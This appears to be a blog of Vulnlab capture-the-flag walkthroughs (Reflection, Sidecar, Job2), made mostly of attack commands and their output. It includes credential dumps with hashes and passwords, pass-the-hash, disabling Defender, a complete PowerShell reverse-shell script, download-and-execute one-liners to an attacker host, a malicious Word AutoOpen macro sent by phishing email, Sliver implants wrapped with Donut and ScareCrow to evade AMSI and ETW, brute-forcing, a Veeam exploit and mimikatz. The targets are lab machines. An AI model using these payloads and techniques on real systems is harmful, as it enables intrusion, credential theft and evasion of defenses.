[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

 

 

vulnlab-sidecar

vulnab-sidecar

a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

Create a malicious link on a Windows pc

i used

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

 

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

 

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

so we have

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let’s donut this file

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then Scarecrow the file

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

got a session, but after uploading SharpHound.exe , my sliver session gets disconnected

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new lnk file

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

 

To be continued …

 

vulnlab-job2

job2 a hard windows machine , from phising to admin

Preperation

1. Enable Developer Tools in the Ribbon Menu to gain access to macros
2. Name your Macro AutoOpen() if you are working with Word 2016+
3. Select the Current Document as the place to store the Macro
4. Don’t use .docx as the file extension since it won’t allow for embedded macros. Either use .doc or .docm

Do the testing on your lan 1st ( a kali box and a windows11 pc )

i used this macro

Sub AutoOpen()

  a = Shell("""curl"" ""192.168.1.41/rcat.exe"" ""-o"" ""C:\Windows\tasks\rcat_192.168.1.41_443.exe""", vbHide)
  b = Shell("C:\Windows\tasks\rcat_192.168.1.41_443.exe", vbHide)

End Sub

Open the puck3.docm 2 times, 1st to download rcat, and 2nd time to execute rcat.exe

If you receive a reverse shell , start the job2 box , to get the job2

Here we go …

We start with a nmap scan

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine  a website, and find out how to apply for the job2

Send your CV 2 times ( of course 1st modify your test ip on lan to your tun0 ip of the vulnhub vpn. in the macro of puck3.docm

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

 

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand’s pass

next evil-winrm to the box, and find VEEAM Backup installed

and used CVE-2023-27532-RCE-Only , to finish JOB2

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 

.

*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

and catch the admin shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

 

That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

 

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1

phissim.ps1

Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

for(;;){
    sleep 45
}